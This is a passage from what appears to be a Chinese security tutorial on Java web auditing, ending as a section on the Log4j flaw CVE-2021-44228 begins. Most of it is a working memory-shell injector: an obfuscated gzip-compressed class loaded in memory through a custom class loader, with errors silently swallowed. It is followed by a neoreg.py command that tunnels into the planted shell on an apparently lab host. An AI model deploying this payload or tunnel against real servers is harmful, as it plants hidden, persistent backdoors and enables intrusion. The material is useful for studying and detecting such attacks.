byte[] clazzBytes = unGzip(new byte[]{31, -117, 8, 0, -46, 68, -86, 100, 0, 3, -99, 57, 11, 124, 83, -11, -43, -25, 36, -9, -26, -34, -92, -105, -110, 6, 46, 112, 91, 74, 75, 11, 88, -46, -44, 42, 104, -44, 20, 80, 40, 69, 42, 109, 113, 13, 80, -47, 57, 9, -19, 109, -119, -92, 73, 77, 82, 94, 115, 76, 55, 31, -101, -113, 77, -25, 54, 7, 78, 69, -60, 101, 78, 84, 68, 13, 69, 4, -15, -123, -50, -73, -50, 109, 78, -73, -87, 123, -22, -26, -90, 115, 110, -50, 61, -20, 119, -50, 125, -92, 73, 27, -10, -15, 125, -65, 31, -3, 63, -50, -1, -4, -49, -5, 127, -50, -71, -31, -103, 79, 31, 58, 4, 0, 39, 58, 36, 15, -108, -64, 27, 18, -4, 92, -126, 123, -35, 112, 23, -4, 66, -126, -5, 120, -2, -91, 4, 111, 122, 64, -126, -73, 36, 120, 91, -122, 95, 73, -16, 107, 15, 65, 127, 35, -63, 111, 101, -8, -99, 12, -65, -105, -31, 29, 9, -34, -11, 64, 25, -4, -127, -121, 63, 74, -16, -98, 7, 38, -62, 27, 60, -4, -55, 3, 110, -8, 51, -81, -34, -25, -43, 7, 60, -4, -123, -121, 15, -103, -58, 95, -103, -20, 71, -68, -6, -101, 4, 127, -9, 64, 21, 99, -115, -125, -113, 121, -8, 7, 15, -97, -56, -16, 79, -58, -2, 23, -29, -4, 91, -122, -1, -56, -16, -87, 4, -61, 30, -104, -115, -64, 3, 74, -24, -16, 64, 0, -99, 60, 8, 18, -118, 30, -72, 17, 93, 30, 104, 68, 73, 70, -39, -125, 110, -12, 72, 88, -62, -77, -62, -61, 56, 62, 41, -107, 113, -68, -124, 94, 15, -106, -95, -113, -121, 9, 37, 56, 17, -43, 18, -100, -124, -109, 121, -104, 34, -93, 70, -36, -80, -100, 73, 86, -16, 48, -107, -73, -107, 60, 76, 35, 89, -80, -54, -125, -43, 56, -99, 6, 18, -111, -122, 79, 24, -91, -90, 4, 107, 113, 70, 9, -50, 68, 85, -58, 89, -116, 117, -100, -116, 117, 124, 50, 91, 70, 63, -49, -11, 60, 4, 120, 104, -112, -15, 120, 9, 27, 61, -80, -110, 76, -124, 39, -32, -119, -76, -62, 57, -68, 125, 95, -58, -71, 100, 17, 60, -119, 9, -100, 44, 99, 80, -58, 83, 120, 127, -86, 7, 98, 120, 26, 15, 33, 9, -101, 60, -80, 22, -25, 121, 112, 62, 46, 96, -56, -23, -28, 33, 60, -125, -39, 47, -108, 113, -111, -116, -51, 50, 46, -26, 93, -117, -124, 75, 8, 9, 62, -31, -51, -103, 50, 46, -11, 96, 43, -98, -59, 55, -106, -15, -86, -51, -125, -19, -40, -63, -100, -105, -53, 120, 54, 67, 62, -61, 67, 39, 15, 97, -58, 90, 33, -31, 74, 15, 108, 97, 47, 110, -63, 85, 50, 118, -15, 124, -114, -116, -85, 25, -8, 62, 95, 60, -105, -121, -13, 100, -4, 44, 75, 123, 62, 15, -97, 99, -105, 92, -32, -127, -85, 112, 77, 9, -100, -122, 17, 30, -42, 74, -40, -51, -112, 30, 9, 117, 9, 123, 61, 112, 13, -10, 49, -18, 58, 9, -93, 30, -72, -114, 99, -29, 58, -68, -112, -121, -11, 108, -31, 24, 15, -3, 60, -60, 37, 76, 80, 64, -30, 0, -69, -12, 34, 55, -103, 33, 41, 97, -54, 13, 55, -15, -100, 118, -61, -51, -104, 100, -76, 65, 62, -34, -32, -63, -115, -72, -119, -121, -51, 60, 108, -111, -16, -13, 30, -40, -59, -78, -17, -62, -117, 121, -8, -126, -124, 91, 37, -4, -94, 7, -18, -92, 0, -57, 75, 36, -68, 84, -62, 47, 33, 56, -12, 56, 13, -25, 53, -45, -48, -93, -13, 106, 17, -126, -100, -46, 83, -87, 104, 34, -98, 66, 24, -33, 118, 97, 100, 67, -92, 113, 48, 29, -115, 53, -74, 71, 6, -102, 16, -36, -31, 104, 95, 60, -110, 30, 76, 18, -10, -55, -123, -89, -13, -52, 109, 44, 18, -17, 107, 12, -89, -109, -47, 120, 95, 83, 30, 100, -7, -38, 11, -11, -18, 116, -45, 2, -94, -31, -102, 23, -115, 71, -45, 11, 16, -100, 117, -77, 87, 33, 8, -51, 9, -26, -19, -46, 47, 26, -116, -60, -120, -87, 90, 55, -10, -38, -20, 115, 17, -60, -75, -63, -109, 88, -36, 73, 117, -25, 45, -102, 61, -106, -105, -119, -64, -108, 38, -43, -115, 61, -99, -51, -102, -71, -41, -23, -111, 30, 61, -71, 94, -33, -116, 48, -85, 24, 82, 49, -86, -98, -106, 77, -35, -6, 64, -38, 52, -120, 20, 77, -59, 18, -35, -111, -40, 40, 41, -19, -5, 36, -91, 103, 109, 108, -61, 5, 61, 122, -73, -95, -109, -97, 68, -51, 67, 107, -115, -89, -11, 62, 61, 73, -62, -116, -43, -48, -70, -87, -57, 115, 55, -57, -30, 20, 37, 69, 122, 41, -47, -8, -122, -60, 122, -67, 93, 79, -81, 75, -12, 32, 44, 43, 98, -64, -79, -62, 22, -95, 63, -69, -104, 88, -29, -14, -119, -49, 65, 56, -1, -1, 76, -67, 57, 22, 73, -91, -114, -103, -97, 59, 25, -119, -9, 44, -38, -100, -42, -55, -36, -82, -70, -42, 86, 67, 67, -49, 90, 6, -84, 72, -112, -38, -28, 103, 14, -128, 86, 2, 70, -29, -23, 21, 9, 11, 85, -84, 51, 49, 93, 27, -12, 100, -76, -105, 28, -36, 88, -60, 65, 6, 100, 83, 99, 92, 79, 55, -90, 82, -79, -58, 112, -72, 45, 108, -58, -70, -31, 58, 95, -9, 58, -67, 123, 125, 115, 44, -86, 19, -35, -28, 96, 42, -83, -109, 49, 67, -74, 35, 82, 122, -9, 96, 50, -102, -34, -36, -40, -83, 39, -45, -115, -25, -100, 124, -62, 105, -51, -76, -120, -10, 70, -69, 35, 105, -67, -120, 5, 102, -81, -110, -16, -53, 54, -47, -80, -98, 36, -71, 114, 68, 125, 125, 122, 122, 97, 55, -121, -107, -34, -45, -102, 74, 13, -22, 73, -46, -32, -72, -70, -39, -57, -60, -118, 94, -24, -68, -18, -104, -15, -124, 20, -56, -62, 62, -124, 9, 69, 108, -85, -64, 61, 112, -81, 2, 123, -32, 62, -124, -78, 49, 113, -93, -32, 101, 120, 57, -126, 119, -76, -44, 100, 126, 18, -83, -117, -104, -21, -55, -126, 99, -109, -86, 2, 79, -61, 15, 17, 74, 13, 120, 52, -47, 104, 35, 2, -31, -46, -67, -26, 4, 81, -113, -89, -37, -12, 120, 95, 122, 29, -95, 17, -88, 53, 62, 48, -104, 38, -38, 122, -92, -97, -28, -76, -17, -27, 65, 21, -68, 2, 47, 87, -16, 74, 120, 17, 97, -14, 104, 113, 22, 13, 70, 99, 61, 44, -19, 87, -16, -85, -92, 43, 94, -91, -32, -43, 120, -115, -126, -41, -30, -41, 20, -4, 58, -33, -69, 22, -81, 83, -32, 32, 28, 82, -16, 122, -4, -122, 2, 79, -64, -109, 54, 27, -125, 76, -18, -19, 42, 120, 3, 126, 83, -63, 111, -63, 62, 5, -65, -51, 54, 19, 86, 116, -82, 108, 81, -16, 70, -4, -114, 2, -113, -63, -29, 20, 64, 73, 61, -91, -89, 77, 3, -40, 47, 73, 49, 40, 113, -72, -84, -20, 108, 99, 1, -120, -60, 54, -36, -114, 80, -98, 59, 88, -102, 78, 15, -48, 33, -87, 30, 39, 3, 25, -100, 110, 98, -76, -17, -30, -51, 8, -43, -123, -15, -58, -72, -87, 81, -56, -73, -64, 67, 10, -34, -118, 59, 40, 27, 82, 56, 74, 120, -101, -126, 59, -15, 118, -117, -61, -56, 85, 35, 116, -38, 35, -15, -120, -31, -68, 93, 120, -121, -126, -33, -61, -116, -126, -33, -57, 59, 77, 67, 47, 53, 82, 91, 71, -92, -97, 31, -125, 106, -120, 103, 36, -26, -106, -8, 96, -65, -98, -116, 48, 51, 9, 127, -96, -32, 93, -72, 91, -63, -69, -15, 30, 9, -17, 85, 112, 15, -34, 39, -31, 94, 5, -17, -57, 7, 20, 124, 16, -77, -90, -10, 38, 41, 5, 30, -127, -61, 10, -18, -61, 33, 5, -9, -29, 67, 10, 28, -127, -89, 20, 56, 0, 15, 43, 120, 0, 31, -106, -16, 32, -101, -108, -20, -2, 8, 30, -106, -16, 81, 5, 31, -61, -57, 37, 124, -126, -124, -79, -94, -96, -63, 12, 3, 5, -97, 100, -21, -106, -83, -96, 103, -99, -22, -43, -109, 13, 45, -100, -31, -56, -73, 10, 30, -127, -61, -60, 48, -107, 99, -120, 79, -111, 71, -31, 29, 124, 90, -63, 31, -30, -45, -26, 81, 56, 77, -59, -122, 52, -86, -76, 67, -121, -97, -5, -62, 100, 50, -78, 121, -7, 96, 58, 23, 68, 18, 62, -93, -32, -77, -8, 28, -117, 116, 21, 93, -116, -12, -12, -40, 52, -81, -90, 0, -63, -25, -15, 26, -124, 18, -61, -63, -117, 6, 123, 123, 57, 100, -91, -26, -27, 29, 29, 45, -51, 43, 20, 124, -127, 66, 0, 95, -60, -105, 20, 124, 25, 95, -55, 119, 109, 43, 13, -31, 68, -9, 122, 122, -85, 61, 61, 116, 57, -59, 17, -16, 35, 9, 95, 85, -16, -57, -8, 19, 5, 127, -118, -81, 41, -80, 23, -18, 87, -16, 103, -8, 58, 21, -49, -27, -53, 40, -84, -106, 44, 108, 109, -93, -44, -76, -72, 53, -100, 99, -16, 6, -2, 28, -95, -54, 36, 75, 26, 116, -81, -117, -112, -5, 99, -87, 70, -109, 118, -77, -71, 85, -16, 23, -116, 38, 116, -74, 44, 92, 44, -31, 47, 21, 124, 19, -33, -94, 103, -127, 111, 43, -8, 43, 54, -9, -81, 21, -4, 13, -2, 86, -63, -33, -31, -61, 36, -4, -110, -27, -99, 93, 11, 59, 23, 51, -25, -33, 43, -8, 14, 31, -68, -53, 62, -68, 1, -33, -90, -6, 55, -10, 25, -79, -50, -4, -118, -2, 64, 98, -50, -97, -49, -85, 63, 34, -32, 124, 86, -24, 61, -66, -11, 30, -19, 26, 20, -4, 19, -2, 89, -63, -9, -7, -123, 125, -64, -61, 95, -16, 67, 5, -1, -54, 116, 63, -30, -40, -48, 114, -106, -23, -48, -45, 27, 19, -55, -11, -100, 76, -110, -67, -111, 110, 93, -63, -65, -31, -121, 8, 19, 11, 76, 103, 25, -51, -114, 70, 27, 124, -110, 109, 76, -4, 59, -15, -128, -3, -16, 16, -62, -44, 49, -34, 45, -56, 16, 87, 26, 25, 2, 63, 86, -32, 5, 120, 81, -127, -25, -32, 121, 5, 94, -126, -105, -87, 63, 25, 85, 100, 20, -4, 7, 126, -94, -32, 63, -15, 95, 10, -2, 27, -1, 99, 103, 42, 3, -95, 45, -63, -23, 45, -17, 70, 120, 93, 34, 73, 25, -19, 25, 120, 86, -127, 79, -15, 83, 9, -121, 21, 7, -112, -78, 14, -60, -101, 21, -121, -61, -31, -76, 19, -96, -15, -114, 58, -87, 42, 37, -6, 21, -121, -32, 16, 21, -121, -117, -93, -84, -26, 127, -49, -43, 118, -22, 53, 40, 44, -115, -92, -42, 81, -101, 68, -63, -47, -95, 39, -110, -6, -103, 52, -112, 64, -45, 70, -91, -120, 68, 42, 29, -89, 71, -68, -118, -85, 88, -108, 3, 117, 20, 2, 115, -56, 79, 6, 84, 55, -118, -56, -111, 39, 67, 46, 5, 82, -35, -96, -126, -71, 42, 18, 27, -44, -115, -42, -85, -107, 31, -54, -122, 72, 52, 22, 89, 27, 35, -120, 64, -74, -90, -108, -25, -118, 12, 12, -24, 113, 90, 52, 28, 83, -125, 100, 101, -24, 38, -85, 42, 83, 59, 39, -89, 19, 118, 45, -103, 88, 87, -76, -93, 114, -89, 6, -41, -90, 44, -108, 73, 92, -31, -117, 33, -71, 98, 86, 21, 81, -21, -118, 35, 72, 27, 88, -109, -27, -67, 6, -115, 124, 12, -69, 53, 34, -111, 54, 114, 125, 58, 74, -81, 70, -94, -118, -67, -79, -63, 20, -79, 16, -69, 99, -119, 20, -31, -71, -69, 19, -3, 3, -111, -92, -66, 34, 113, -108, 59, 100, -78, -46, 4, -103, 103, 36, -127, 83, -66, -80, -107, -76, -54, -60, -56, 25, 73, -32, -91, -116, -45, 73, -115, -83, -98, -54, -43, -108, 18, 2, 45, 78, -104, -39, -117, -84, 94, 119, 46, 75, -30, -119, -90, 90, -29, -87, 116, 36, -34, 77, 98, 76, -32, -108, 56, 38, 14, 106, -21, 70, 117, 47, -93, 81, 12, -107, -90, 20, -30, 80, 73, 49, -46, -15, 38, 98, 85, 98, -108, 99, -101, -55, -15, 71, 117, 111, -79, -37, -92, -118, -64, 29, 7, 66, -105, -43, 15, -115, 96, 45, -45, 55, 91, -79, -40, 52, -6, 40, 63, 80, -101, 70, -11, 54, 97, 94, -24, -26, -77, 50, 68, -25, 14, -62, 76, -119, 75, 34, -35, -23, 68, -110, 122, -72, -102, -70, 34, 34, 21, -32, 52, -103, -26, 26, 13, 46, 98, -82, 49, 55, -103, 103, 94, -95, 108, 78, -60, 98, -90, -33, 40, 101, 9, -79, 104, 42, 61, 98, -92, -47, -107, -44, 126, 8, 6, -36, -56, 87, 109, -124, -49, 65, -103, -44, -87, -49, -29, 88, -102, -112, 127, -43, 56, 101, 126, -91, -123, 48, 126, -110, 105, -90, -103, 72, 114, 24, -25, 83, 109, -75, -32, 68, -44, 55, 22, 74, -100, -42, 69, 82, 29, -122, 95, -23, 41, 83, -13, 42, -60, -115, 77, -31, -109, -53, 53, -43, -66, -111, 56, 60, 59, 73, 17, -100, 76, 111, -26, -122, -13, 40, 29, -14, -104, -121, 50, -98, 92, -109, 95, 111, 41, -50, 108, 62, -108, -76, -13, 79, -72, 59, 37, 100, -85, 41, 23, -22, -116, -98, 124, 98, 49, 76, 82, -127, 50, 6, -67, 126, -117, -66, 89, -80, -105, 68, -11, 88, 15, -35, 44, 43, 48, -122, -7, -19, 57, -82, 0, 64, 41, -126, 62, -28, -62, -36, -78, 21, 34, 19, -88, 16, -39, -64, -15, -102, -97, -105, -83, 125, 113, -54, -67, -51, 17, 118, 81, 105, 33, 87, 83, -116, 78, 61, 53, 64, 33, -96, -101, 31, -91, -109, -13, -44, -52, 43, 73, 77, -26, -27, -106, 100, 50, -111, -76, -75, -55, -17, -91, 55, 83, -101, -33, -49, -23, -107, 67, -93, 59, 49, -80, -103, 63, -24, -58, -6, -91, -75, 8, -56, -80, -121, 64, -90, -89, -5, 50, 37, -93, -108, 110, 124, -13, 8, -100, 118, 56, -86, -19, 100, 115, -44, 70, -126, 115, 103, -54, 0, 112, 16, -26, -27, 38, 19, -85, -87, -8, -9, -79, -23, -122, 81, -72, -28, -94, 110, 51, -101, 81, -119, -82, 27, 77, -55, -86, -29, -26, -43, 50, 66, -20, -115, -10, -47, -117, 94, 68, 31, -56, -21, -115, -36, 94, 71, -71, -83, -104, -76, 58, -65, 51, 46, 58, 35, 18, 59, -115, 100, 120, -22, 127, -1, -76, -4, 111, 95, -115, -50, 62, 22, 119, 86, 17, 2, 69, -47, 93, 73, -67, 63, -79, 65, -73, -65, 21, -30, 86, -21, 97, 55, -121, 114, 36, -58, -97, -7, 92, 59, -90, -28, -118, 75, 33, 82, 19, 31, 21, 61, -32, 42, 33, 26, -98, -49, 89, -108, 17, 44, -46, 84, 107, -12, 72, 50, -33, 53, -71, 67, 34, 89, -110, 78, -28, 90, 32, 106, -72, 70, 126, -23, 24, -61, 92, -24, -115, 69, -23, 13, 40, -108, 6, 58, -11, -2, 8, 37, 103, 54, 121, 69, 93, 115, -79, 26, 109, -35, 9, 28, 99, 73, -73, 89, -44, 25, -82, 21, 83, 3, 49, -50, -4, -59, -46, 69, -63, 47, 25, -71, -46, 76, 90, -84, -92, 46, 34, 105, 62, 51, -87, -49, 44, 103, -108, 7, 104, 53, -70, 117, 76, -79, -102, -7, -49, 55, 63, -51, -110, 1, 73, -65, 118, 122, -79, 45, 49, -67, -97, 62, 42, 8, -69, -124, 19, -99, -75, 53, -117, 70, 94, -77, -55, -28, 74, 45, 126, -71, -2, -45, -54, 51, -83, 102, 106, 50, 26, -59, 60, -5, -113, 116, -113, 92, -81, -93, -87, -123, -87, 20, -1, -60, 69, -31, -71, 36, -103, -24, -25, -116, 58, 6, -49, -56, -73, 43, 86, -97, -35, 66, 113, 95, -124, -56, 25, 69, 12, 53, -10, -9, -112, 124, -10, 73, -67, -105, -33, 68, -93, -39, 35, 52, 89, 101, -68, -40, 25, -1, -40, -109, -30, -97, 14, 72, 74, -93, 109, 27, -105, 50, 127, 74, -80, -9, 46, -13, -25, 26, -124, -45, -118, -68, -123, 99, -3, 13, 70, 98, 27, -101, 121, -89, -50, 48, -100, -101, 1, 70, 82, -121, -23, 112, 23, -108, -128, 3, 118, -61, -35, -32, -92, -7, 30, -72, 23, -128, -26, 61, 112, 31, -51, 110, -2, 32, 2, -124, 7, 12, -40, -125, -32, -93, 117, 22, -10, -47, 56, 68, -112, 50, -102, -111, 102, -47, 79, 16, 70, -25, 95, 14, -24, 11, -64, 60, 118, -67, 5, 46, 56, -114, -26, -117, -21, 15, -125, -125, -2, -75, 7, -100, 115, 58, 2, -62, -100, -112, -32, 15, -120, 115, 14, -125, -109, -2, 61, 8, -76, 113, -47, 70, -92, 127, 15, -126, 43, 32, -47, 90, -54, -126, 28, 20, 3, -78, -67, 116, 5, -68, 46, 123, 45, 5, -68, -116, -30, 14, -55, 1, 111, 14, -63, 29, -16, -70, -19, -75, 39, -32, -11, -40, -21, -110, -128, -73, -60, 94, 43, 66, 112, -100, 24, 44, 117, 5, -57, 75, 65, -81, 28, 44, -13, -70, -126, 62, -81, 20, -100, 64, -21, -119, 94, 119, 80, -43, 4, -97, -57, 121, 16, 74, -122, 64, 57, 12, -29, 66, -109, -68, 117, -76, 9, 77, 54, -89, 41, -66, -46, -112, 70, 127, -27, 13, -66, -15, 57, 36, -55, -92, -20, -72, 21, -18, -94, -93, -118, 6, -97, 55, 119, 84, 22, -102, -86, 77, -51, -126, 47, 88, -87, 86, 58, 118, -128, 43, 3, -89, -88, -107, 15, -53, -95, 105, -38, 84, 109, 90, 22, 38, -104, -80, -38, 3, 48, 113, -11, 62, 80, -75, -118, 44, 76, 58, 0, -18, -43, -38, -76, 125, 48, -103, -42, 89, -104, 18, -86, -56, 12, 63, -94, 122, -124, 29, 16, -46, 42, -100, 106, 73, 22, -76, -112, -90, 85, 48, 106, -71, -86, -12, 24, 51, -61, -54, -75, 10, 62, -84, 8, -47, -111, -45, 62, -27, -125, 10, 63, -17, -90, -122, 42, -75, 74, -43, 61, 4, -107, 67, 48, 45, 52, 57, 99, 32, 78, -30, -109, -22, 44, 76, -41, -120, 83, 13, 15, -75, -50, -35, -38, 100, 117, -94, 97, 88, 34, 116, -60, 113, 5, 109, 85, 99, 75, -118, -8, 102, 100, 97, -26, 54, 80, 12, -118, -77, -74, 59, -94, -116, -117, 97, 70, -95, 81, -16, 29, 103, -23, -35, -43, -32, -85, -53, -103, -64, 29, -86, 60, 0, -77, 87, 107, 21, -5, -64, 79, 122, -109, -42, 20, 6, -127, 80, -107, 86, -91, 85, 102, -95, 65, -85, 18, -78, 112, -68, -81, 81, -85, -54, -62, 9, -37, -128, -26, -61, -48, -24, -49, -62, -119, -66, 57, 67, 48, 55, 84, -83, 85, -93, 112, 16, 78, 90, -19, -12, -121, 49, 11, 39, 27, -57, 26, -55, 28, -52, -62, 41, 13, -66, 83, 115, 108, 78, 99, -44, 33, 8, -123, -90, 107, -45, -121, -96, 73, -101, -66, 31, -26, 33, -124, 106, -76, -102, -3, 48, 31, 97, 27, -52, -31, -43, 2, 4, -106, -88, -74, -63, 119, 58, 81, 45, 89, -19, -44, 106, -61, -106, -108, 51, 72, -96, -38, 33, 56, 67, 35, 37, 23, 102, -122, -97, 41, -18, -31, 21, 44, -25, -94, 80, 77, 6, -92, 16, 25, -53, 118, -100, 70, -50, -14, -109, 29, 76, 3, 55, 103, 97, 49, 1, -76, 114, -53, -123, -75, 90, 109, 22, 90, -120, 67, -115, 54, -61, -87, -51, 56, -108, -123, 37, 90, 77, 22, -50, -28, 97, 41, 19, 108, -35, 15, 103, -15, -117, 89, 86, 32, -15, 89, -7, 18, 107, -75, 71, 32, -88, -43, -6, -38, -78, -48, -66, 29, 2, -76, -22, 48, 86, 53, 44, 118, 22, -106, 19, 117, -63, 119, -74, 104, 43, -75, 90, -48, 102, -80, 102, 93, -103, -31, -67, -52, -31, 51, 101, 120, -35, 78, 24, -57, -53, 78, -106, 126, 38, -81, -62, -52, -20, 41, -48, -24, -26, 10, -45, 28, -86, 72, 10, 24, -9, -100, -69, -53, 4, -96, 72, -99, 113, 0, 86, -110, -118, -85, 66, 51, 89, 122, 10, -39, -43, -63, 90, -78, -61, 52, -75, -106, 14, 103, -79, 62, -77, -100, 42, -39, -83, 75, -101, -87, -51, -54, -62, 57, -103, -31, -41, -75, -103, 89, 88, 77, 103, -126, -17, 92, 83, 30, 95, 27, -53, 67, -89, -27, 67, 112, -98, 65, 125, -124, -93, 33, -100, -51, -108, 34, -110, -80, 62, 59, 58, 34, 5, -33, -7, 118, 100, 21, 19, -107, -20, 94, 106, -121, -24, 17, -4, -104, -74, -29, -115, 109, 37, 69, -20, -25, 40, 98, -73, 3, 7, -86, -49, -128, 77, -93, -43, 4, 94, 13, -63, 5, -63, -86, 33, 88, -61, 97, -109, -123, -56, 1, 88, 75, -81, 78, -83, -38, 7, -35, 101, 37, 67, 89, -24, -47, -86, -99, 89, -48, -69, -10, 66, -81, 86, -87, 85, -17, -121, 62, 39, -87, 56, 69, -11, -6, -42, -123, 51, -104, 34, 58, -68, -114, -122, 105, 42, -29, -104, -82, 38, -24, -7, -60, -17, 66, -125, 95, -125, 113, 109, 63, -84, 119, -112, -13, 98, 102, -44, 71, -78, -48, -97, 1, 49, 84, 101, -99, -59, 29, -48, -107, -63, -39, 116, 39, 97, -36, -71, 107, -52, -99, 35, -80, 81, 117, 13, -63, 0, -67, -107, 105, 108, -90, -117, -126, -43, -86, 20, -100, -18, 12, -42, -40, 62, -87, 85, -85, 111, -127, 78, -75, -102, -3, -60, 24, 73, -118, 46, -89, 90, -51, -34, -88, 101, 103, -99, -61, -64, 84, -105, 90, -93, 86, -81, 9, -46, -96, -70, 110, 3, 15, -19, -90, -33, 6, 94, -110, 124, 28, 71, 78, 58, -100, -127, -15, 57, 6, -103, -31, 123, 109, 45, 97, 18, 49, -50, -45, -78, -54, -48, 18, 54, -110, -60, -125, -122, -60, -3, -93, 37, -98, -84, -114, -77, 50, 56, 63, -17, 67, 44, 58, 89, -105, 47, 110, -24, 98, 43, 111, 52, -58, 77, -37, -96, -108, -8, -47, 106, 51, 69, -25, 7, 57, 118, -45, -118, -80, -77, 13, -89, -47, -21, -102, 82, -16, -70, -14, 34, 36, 3, 85, -102, -111, 54, -3, -102, 76, -103, -50, 72, -99, 5, -57, 66, -69, 115, 55, 21, -73, 103, -15, 42, -68, 22, -86, 28, 79, 56, -98, 117, -68, 0, 85, -62, 22, -31, 41, -31, 25, -102, 63, 17, 81, 20, -96, 74, 108, 16, -17, 22, -9, -48, -4, -90, 107, -86, -85, 10, -86, -88, -120, -19, 114, 109, -122, 42, -68, -61, -15, 50, -49, -114, 87, -100, 119, -13, -20, -68, 71, 8, -14, 44, -100, -30, -38, -64, -77, 81, -19, 14, -64, -61, 102, -75, -61, 73, 32, -126, 76, -77, -25, 0, 108, 33, 39, 125, -66, -67, -2, -48, 2, 103, 80, 80, -123, -54, -99, -16, 81, -67, 42, 92, 38, -32, -36, 50, 24, -34, 26, 20, 9, -76, 3, -22, 3, -2, 7, 64, 80, 69, -15, -30, -109, -78, 112, 113, -105, -75, 115, 109, -107, 54, -103, 123, -33, 23, -78, -80, -75, 43, 3, -5, -13, -81, -70, -116, -85, 45, 71, -67, -86, -70, -54, -32, -125, -83, -46, -59, -105, -28, 29, -72, -68, -29, -73, -118, 54, -47, 47, -102, 68, 123, -14, -119, 74, -1, 15, 114, -86, 84, 6, -121, -73, 122, 93, 5, 71, -110, -9, -12, -83, -58, 54, 51, -84, 4, -78, 112, -55, 30, -85, 35, 56, 8, -121, 44, 27, -7, 64, 0, 15, -51, -82, 122, -54, -117, -19, -127, 67, 11, 56, -96, 43, -9, -63, -91, 33, -63, 73, 118, 17, -55, 84, -17, 16, 41, 87, 64, 21, 47, 19, 113, -18, 92, 82, -104, 97, 110, -43, -27, -72, 117, -8, 93, 26, -115, -78, -7, 100, 1, -118, 100, -95, 72, 6, -118, 100, -94, -20, -44, 72, 82, 22, -45, 123, 2, -53, -97, -123, 47, 89, -8, 65, 89, -107, -67, -13, 119, -128, 91, -93, -14, -109, -34, -61, -108, 84, -103, -95, 38, 17, 74, -11, -61, -81, -47, 104, 16, 57, 95, 99, -99, -58, -77, 33, 100, -17, -68, -83, 98, 1, 29, -73, -22, 30, 77, -57, -51, 80, -109, -114, -37, -96, -29, 54, -23, 80, 107, -95, -54, 46, -78, -42, 38, -43, -51, 36, 50, -61, 83, -52, 91, -122, 125, 100, -2, 97, -98, -102, 43, 110, -88, 82, 100, 31, 23, -51, 125, -66, -46, 54, -65, -17, -53, 89, -72, -116, -115, 100, 71, -47, -46, -128, 74, -51, -109, 104, -43, -98, 122, -82, 52, -94, -109, 8, 81, 17, -70, -36, -40, -48, -70, -62, 44, 61, 109, 121, 72, 76, -57, -128, -111, -57, 51, -61, 67, -11, 78, 2, -106, 11, -36, 35, -104, 2, 60, 74, 127, 2, 57, -120, 3, -6, 49, 120, -36, 18, 101, 61, 117, -125, 18, -51, 23, 112, 17, -81, -89, 26, -98, -123, 43, -38, -121, -32, -54, -114, -122, -3, -16, 21, -82, 82, 103, -46, -30, -85, 92, -92, -82, 10, 9, -84, -50, -43, 33, 81, 19, -83, -77, 58, 94, 25, -121, -41, -124, 92, -102, -21, 81, -72, 118, 27, -108, 105, -82, 44, 124, -115, -30, -30, -21, -37, 64, 20, 118, 103, -122, 95, -51, 12, 103, -23, 125, 22, -118, -32, -26, -1, -13, -79, -38, -53, 107, -23, 69, 81, -76, -64, -91, 70, 15, -42, -18, 92, -32, 63, 20, 20, 36, -54, 121, -82, 3, 112, -35, 106, -22, 57, -81, 15, 73, -107, -86, -80, 19, 34, 26, 85, -23, 111, 4, 69, 77, -46, 92, 78, -51, 69, 117, -10, -122, 46, -115, 50, -24, 55, 73, 83, -71, -121, 93, 78, -105, -36, 116, -22, 118, 106, 110, -29, -76, -110, 96, 107, -42, 44, 80, 69, 97, 23, 53, 76, -94, -41, 125, 59, 76, 32, -49, 26, 61, -104, -101, 18, 9, -91, 37, 55, -19, 53, 119, 56, 51, 124, 107, -64, -76, -109, -101, -1, -53, -60, 18, -19, 106, 18, -105, -83, -77, -47, -17, -108, -67, 19, -121, -32, 91, 97, -65, -9, 56, 107, 101, 37, 105, -110, -73, -46, 127, 104, 39, 116, -6, 43, -25, 28, -127, 37, 52, -78, -99, 30, 5, -9, 54, -54, -63, 2, 85, 34, 110, 13, -60, 12, -43, 102, -63, -54, -99, 98, -96, -110, 3, 76, 19, 15, -79, -36, 107, -122, -32, -37, -108, -55, 105, -53, -43, -107, -114, 93, -105, 57, -55, 127, -9, 4, -116, -56, 65, -24, -124, 62, -72, -48, 112, -102, -101, -1, 27, -49, 114, 91, -52, -118, -96, 53, -127, 67, 7, -31, -58, 14, 35, 116, 2, 36, -59, 50, -114, -99, 44, 124, 39, 36, -6, 36, -90, -72, 109, 27, -108, -20, -123, -19, 44, -64, 12, -33, 77, 35, -112, -17, 50, -60, -25, -69, -39, -126, -56, 123, -31, -106, -112, -40, -96, 10, -102, 24, 54, -62, -25, 1, 127, 125, 67, 96, 8, 110, 29, 29, 58, 110, -2, -31, -35, -110, -31, 68, 10, 29, -106, 97, -90, -97, 25, -110, -46, -11, 36, -13, 14, 14, -113, 44, -36, -74, -99, -98, 12, 7, -22, 78, 77, -12, 55, 100, -31, -10, -79, -124, -98, -125, -25, 45, 43, 31, 79, -124, 68, -102, -87, -18, -19, 34, -109, -34, -47, 30, -88, 40, -17, 17, -42, 100, -31, 123, -27, 107, 22, 112, 59, 45, 4, 56, -14, 50, -102, 96, 123, -24, 5, 120, -47, -70, 123, -118, -15, 53, 3, 80, -17, 119, 25, 105, -50, 47, 26, -109, 87, -34, 116, -119, 95, 48, -105, 94, 90, 58, -51, -27, -108, 77, -105, -52, -85, -40, 109, 17, 121, 9, 94, -74, -120, -100, 78, 66, 49, -111, -71, 20, 117, 109, -11, -82, 114, -58, -67, 126, 69, -67, 88, -18, -107, -73, 88, 107, -95, -36, -21, -75, -41, -50, 114, -17, 20, 123, 109, 39, -65, 87, -32, 71, 22, -79, 82, -102, -99, 52, 59, -124, -35, -42, -39, -85, -16, 99, -53, 100, -29, -24, -113, -49, -84, -81, 40, -37, 28, 63, -95, -65, -97, 30, 11, -46, 107, -16, -77, -47, -33, 100, -44, 57, 125, -33, -50, 48, -81, -25, 62, -39, 38, 27, -6, 0, -108, 28, -128, 59, -55, -92, 63, -72, 31, 122, 77, 106, -16, 63, -22, -91, 95, 93, 55, 37, 0, 0});
Class clazz = loader(clazzBytes);
namespace.put(charslist, clazz.newInstance());
}
namespace.get(charslist).equals(args);
} catch (Exception e) {
}
}
}连接脚本文件
python neoreg.py -k pass -u http://192.168.100.1:8088/tmall/memshell
Log4j漏洞代码审计
Log4j简述
定义:Log4j是一个用于Java语言的日志记录工具,它提供了灵活的日志管理解决方案,允许开发者控制日志信息的输出目的地、格式和级别。
功能:通过Log4j,开发者可以轻松地将日志信息输出到控制台、文件、数据库等多种目的地,并根据需要自定义日志的输出格式和级别,从而方便地进行程序调试、性能监控和故障排查。
Log4j远程代码执行漏洞(CVE-2021-44228)简述
